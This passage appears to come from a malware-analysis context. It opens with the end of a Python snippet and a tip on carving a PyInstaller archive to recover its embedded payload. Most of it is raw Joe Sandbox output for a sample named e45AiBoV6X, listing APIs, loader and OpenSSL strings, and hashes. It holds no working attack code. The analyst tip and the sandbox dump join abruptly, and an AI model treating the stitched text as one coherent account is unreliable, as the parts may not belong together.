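              len(r["loader_messages"]), r["mei_cookie"])
```

Run against a real image, pass the raw bytes of the executable or of the 00007FF6FB1E0000 dump; a `pyinstaller-bootloader` verdict is the cue to carve the CArchive and recover the embedded .pyc payload rather than keep reversing the C loader.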
                                                              APIs
                                                                • Part of subcall function 00007FF6FB1E86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6FB1E3FA4,00000000,00007FF6FB1E1925), ref: 00007FF6FB1E86E9
                                                              • ExpandEnvironmentStringsW.KERNEL32(?,00007FF6FB1E7C97,?,?,FFFFFFFF,00007FF6FB1E3834), ref: 00007FF6FB1E782C
                                                                • Part of subcall function 00007FF6FB1E26C0: MessageBoxW.USER32 ref: 00007FF6FB1E2736
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                               • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                              • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                              • API String ID: 1662231829-930877121
                                                              • Opcode ID: 5adf1a7b4f365c991e592d6daa758356e56cb82b092043d5b28c068608273831
                                                              • Instruction ID: 2a2c100b0747b2f2dabfa6ddf9d6b2e70d0fd2179999a184dedd6c9b8e97e886
                                                              • Opcode Fuzzy Hash: 5adf1a7b4f365c991e592d6daa758356e56cb82b092043d5b28c068608273831
                                                              • Instruction Fuzzy Hash: 33416F11F2964381FB60EB24E9616BE6251AF9C7C8F545031DA6EC2AF9FE6CF108C740
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1990278020.00007FFDFB001000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFB000000, based on PE: true
                                                              • Associated: 00000001.00000002.1990234767.00007FFDFB000000.00000002.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB00D000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB065000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB079000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB08A000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB090000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB09D000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24D000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24F000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB27A000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2AB000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2D1000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB31F000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB325000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB327000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB343000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB350000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1991500652.00007FFDFB354000.00000080.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1991539153.00007FFDFB356000.00000004.00000001.01000000.00000010.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb000000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Event$FileSource$ByteCharDeregisterHandleMultiRegisterReportTypeWideWrite
                                                              • String ID: $OpenSSL$OpenSSL: FATAL$no stack?
                                                              • API String ID: 1270133462-2963566556
                                                              • Opcode ID: f345fe9751aee154af01c3e1e6d1fa697fd8000db767964d7236d7de487c6ed0
                                                              • Instruction ID: 0d1ea05057f81401bfa15a94c505267589af4423a5f6aabf2c91f99a78ded360
                                                              • Opcode Fuzzy Hash: f345fe9751aee154af01c3e1e6d1fa697fd8000db767964d7236d7de487c6ed0
                                                              • Instruction Fuzzy Hash: 9A91D473F09B8786EB209F25D8605A937A0FB457D8F444235EAAD07AE9EF38D255C300
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1991624093.00007FFDFB381000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFB380000, based on PE: true
                                                              • Associated: 00000001.00000002.1991585735.00007FFDFB380000.00000002.00000001.01000000.0000000F.sdmp
                                                              • Associated: 00000001.00000002.1991624093.00007FFDFB3F3000.00000040.00000001.01000000.0000000F.sdmp
                                                              • Associated: 00000001.00000002.1991624093.00007FFDFB3F5000.00000040.00000001.01000000.0000000F.sdmp
                                                              • Associated: 00000001.00000002.1991624093.00007FFDFB418000.00000040.00000001.01000000.0000000F.sdmp
                                                              • Associated: 00000001.00000002.1991624093.00007FFDFB423000.00000040.00000001.01000000.0000000F.sdmp
                                                              • Associated: 00000001.00000002.1991624093.00007FFDFB42D000.00000040.00000001.01000000.0000000F.sdmp
                                                              • Associated: 00000001.00000002.1992057570.00007FFDFB430000.00000080.00000001.01000000.0000000F.sdmp
                                                              • Associated: 00000001.00000002.1992103361.00007FFDFB432000.00000004.00000001.01000000.0000000F.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb380000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: 00007B6570
                                                              • String ID: ..\s\ssl\ssl_ciph.c$ECDHE-ECDSA-AES128-GCM-SHA256$ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384$ECDHE-ECDSA-AES256-GCM-SHA384$SUITEB128$SUITEB128C2$SUITEB128ONLY$SUITEB192
                                                              • API String ID: 4069847057-2661540032
                                                              • Opcode ID: 73a2b98f0341162a4e3f0692160103fb4748255efad1c5f3900bd53c3e4ab39e
                                                              • Instruction ID: c8e8e44005d181a017e4bb9a5558a58b68d82c1d02f6d671eaeead4c6e8fa171
                                                              • Opcode Fuzzy Hash: 73a2b98f0341162a4e3f0692160103fb4748255efad1c5f3900bd53c3e4ab39e
                                                              • Instruction Fuzzy Hash: 9E419072B4AA47ABE714AB14D861B7877E1EB48B48F004035DA2D877F8DF6CE550CB40
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1990278020.00007FFDFB001000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFB000000, based on PE: true
                                                              • Associated: 00000001.00000002.1990234767.00007FFDFB000000.00000002.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB00D000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB065000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB079000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB08A000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB090000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB09D000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24D000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24F000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB27A000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2AB000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2D1000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB31F000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB325000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB327000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB343000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB350000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1991500652.00007FFDFB354000.00000080.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1991539153.00007FFDFB356000.00000004.00000001.01000000.00000010.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb000000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: 00007$A1370$B5630
                                                              • String ID: ..\s\crypto\ts\ts_conf.c$accuracy$microsecs$millisecs$p$secs
                                                              • API String ID: 751195488-1596076588
                                                              • Opcode ID: ae98376ed62e7f2547e13ed3231a9dc688f41d63b3bfb75b3373190d81aa6424
                                                              • Instruction ID: 038ae38c37a9f48ed18c555615140fb83476b08cc58254cc207abe62a8eb5b44
                                                              • Opcode Fuzzy Hash: ae98376ed62e7f2547e13ed3231a9dc688f41d63b3bfb75b3373190d81aa6424
                                                              • Instruction Fuzzy Hash: C651B062F1A68786EB04AB269830AB937A0BF45B88F440135ED6E437FDDF3CE505D200
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                              • String ID: P%
                                                              • API String ID: 2147705588-2959514604
                                                              • Opcode ID: 028f263e58f42d33d872b22938efc015f71aa7b4c996476cfe5add7d8b08dd36
                                                              • Instruction ID: 3dc3369830e126535fdb4c2228ed0b968f663e87a8ca85238e0f76eaa7092272
                                                              • Opcode Fuzzy Hash: 028f263e58f42d33d872b22938efc015f71aa7b4c996476cfe5add7d8b08dd36
                                                              • Instruction Fuzzy Hash: 5C51E7266147A286D7349F22B4681BEB7A1F798BA5F004121EBDF83794EF3CD145CB10
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989811289.00007FFDFAEE1000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FFDFAEE0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989771802.00007FFDFAEE0000.00000002.00000001.01000000.00000013.sdmp
                                                              • Associated: 00000001.00000002.1989811289.00007FFDFAF44000.00000040.00000001.01000000.00000013.sdmp
                                                              • Associated: 00000001.00000002.1989811289.00007FFDFAF93000.00000040.00000001.01000000.00000013.sdmp
                                                              • Associated: 00000001.00000002.1989811289.00007FFDFAFEC000.00000040.00000001.01000000.00000013.sdmp
                                                              • Associated: 00000001.00000002.1989811289.00007FFDFAFF1000.00000040.00000001.01000000.00000013.sdmp
                                                              • Associated: 00000001.00000002.1989811289.00007FFDFAFF4000.00000040.00000001.01000000.00000013.sdmp
                                                              • Associated: 00000001.00000002.1990150988.00007FFDFAFF5000.00000080.00000001.01000000.00000013.sdmp
                                                              • Associated: 00000001.00000002.1990196980.00007FFDFAFF7000.00000004.00000001.01000000.00000013.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfaee0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                              • String ID:
                                                              • API String ID: 349153199-0
                                                              • Opcode ID: 3e50bca76b458b5b335c38d1977d3d2f200015baaf06637f67122f405ac3e86f
                                                              • Instruction ID: 4ceabc019f29a6f1169d5f8dc23aee173c3ffd6a3f6a44ce20c7a5f7215bccb9
                                                              • Opcode Fuzzy Hash: 3e50bca76b458b5b335c38d1977d3d2f200015baaf06637f67122f405ac3e86f
                                                              • Instruction Fuzzy Hash: DC818F21F0824346FF6CBF6598E1A796290AF85780F5641B5ED6E473DEEE2EEC418700
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID: -$:$f$p$p
                                                              • API String ID: 3215553584-2013873522
                                                              • Opcode ID: 6485ef080591767760fe67f9caec812fff4e1ba5c20858478bd9f0fbec74de2f
                                                              • Instruction ID: 425afb690ce728bd8f81615d2566d3da986daa388b8db50b85d974ed8a3e8c18
                                                              • Opcode Fuzzy Hash: 6485ef080591767760fe67f9caec812fff4e1ba5c20858478bd9f0fbec74de2f
                                                              • Instruction Fuzzy Hash: 6812B571E0C24386FB24DB15D1542797692FB8879CF944136D6AA87AE8FF3CE590CB04
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID: f$f$p$p$f
                                                              • API String ID: 3215553584-1325933183
                                                              • Opcode ID: 47a7a6303f50c331757a7ed503f6ccc132970c05c2223996d06c8e5714df85c4
                                                              • Instruction ID: e6ac04964fe0ad5565ba27a5d55502366ca34db5c8ade0f5475fa164ea720470
                                                              • Opcode Fuzzy Hash: 47a7a6303f50c331757a7ed503f6ccc132970c05c2223996d06c8e5714df85c4
                                                              • Instruction Fuzzy Hash: EF129462E0C14386FB20DF54E0587B97292FB88758F984135D6AA876E4FF7DE980CB50
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1990278020.00007FFDFB001000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFB000000, based on PE: true
                                                              • Associated: 00000001.00000002.1990234767.00007FFDFB000000.00000002.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB00D000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB065000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB079000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB08A000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB090000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB09D000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24D000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24F000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB27A000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2AB000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2D1000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB31F000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB325000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB327000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB343000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB350000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1991500652.00007FFDFB354000.00000080.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1991539153.00007FFDFB356000.00000004.00000001.01000000.00000010.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb000000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastsetsockopt
                                                              • String ID: ..\s\crypto\bio\b_sock2.c$o
                                                              • API String ID: 1729277954-1872632005
                                                              • Opcode ID: 34993e59505dbed600dca64135d27a9ba0d4750b564e5c6ba914b5e12530ade6
                                                              • Instruction ID: 9593598e7065e74465ac96409bd3d581b4efafaa192e207518edd4a42d9f6c35
                                                              • Opcode Fuzzy Hash: 34993e59505dbed600dca64135d27a9ba0d4750b564e5c6ba914b5e12530ade6
                                                              • Instruction Fuzzy Hash: B751B171B0A54386E7209F21E824ABE7360FB82788F544235E6A843AEDCF3DE505DB04
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Message
                                                              • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                              • API String ID: 2030045667-3659356012
                                                              • Opcode ID: 6856e602118002354ba9607ac17403177552b81d19a34f6e1506d3c37e34e51f
                                                              • Instruction ID: 6f7834727ce1eb4a92e1931a37700c06773c20887ed0693cc16d563ca2b5f628
                                                              • Opcode Fuzzy Hash: 6856e602118002354ba9607ac17403177552b81d19a34f6e1506d3c37e34e51f
                                                              • Instruction Fuzzy Hash: 85417C22E0864382FB20DB22A9545BEA390BB48BC8F444431ED6E87BF5FE2CF4548740
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1990278020.00007FFDFB001000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFB000000, based on PE: true
                                                              • Associated: 00000001.00000002.1990234767.00007FFDFB000000.00000002.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB00D000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB065000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB079000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB08A000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB090000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB09D000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24D000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24F000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB27A000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2AB000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2D1000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB31F000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB325000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB327000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB343000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB350000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1991500652.00007FFDFB354000.00000080.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1991539153.00007FFDFB356000.00000004.00000001.01000000.00000010.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb000000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: HandleModule$AddressProc
                                                              • String ID: OPENSSL_Applink$OPENSSL_Uplink(%p,%02X): $_ssl.pyd$_ssl_d.pyd
                                                              • API String ID: 1883125708-1130596517
                                                              • Opcode ID: c4aead17072fba216eea99f021f7cf45f47fd7f2a5a9cbf259b3f8ced4e703a5
                                                              • Instruction ID: 9803b1b65dcdc16cbacc15aadda5e4e92a1fef10f17bc6cb924356a2ff050c19
                                                              • Opcode Fuzzy Hash: c4aead17072fba216eea99f021f7cf45f47fd7f2a5a9cbf259b3f8ced4e703a5
                                                              • Instruction Fuzzy Hash: 45514865F0AB5382F711AF24A82097423A0FB597A8B044735D97D926FEEF7CB2858700
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1990278020.00007FFDFB001000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFB000000, based on PE: true
                                                              • Associated: 00000001.00000002.1990234767.00007FFDFB000000.00000002.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB00D000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB065000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB079000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB08A000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB090000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB09D000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24D000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24F000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB27A000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2AB000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2D1000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB31F000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB325000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB327000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB343000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB350000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1991500652.00007FFDFB354000.00000080.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1991539153.00007FFDFB356000.00000004.00000001.01000000.00000010.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb000000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: InformationObjectUser$AddressErrorHandleLastModuleProcProcessStationWindow
                                                              • String ID: Service-0x$_OPENSSL_isservice
                                                              • API String ID: 1944374717-1672312481
                                                              • Opcode ID: b0e2507b54a2fee0f286af568643ff84d15fb4472f624db1291a1182b8891a4e
                                                              • Instruction ID: e7c1eed0caf162c8e92ff27ad89f55e5f9bcc8c92b741d87eed95b2499cdcb84
                                                              • Opcode Fuzzy Hash: b0e2507b54a2fee0f286af568643ff84d15fb4472f624db1291a1182b8891a4e
                                                              • Instruction Fuzzy Hash: 32413022B06B8796EB50AF24D960AA83390EF457B8B484735E9BD477F8DF3CE5448300
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                              • String ID: CreateProcessW$Failed to create child process!
                                                              • API String ID: 2895956056-699529898
                                                              • Opcode ID: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
                                                              • Instruction ID: e80bbda4e40d2818f9b88610f948c8e1d78189ea65abe69411fbe6e041833de5
                                                              • Opcode Fuzzy Hash: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
                                                              • Instruction Fuzzy Hash: 7541EF35E1878281DB20DB24E4552AEA291FB8D364F540735E6BD877E9EF7CD044CB40
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
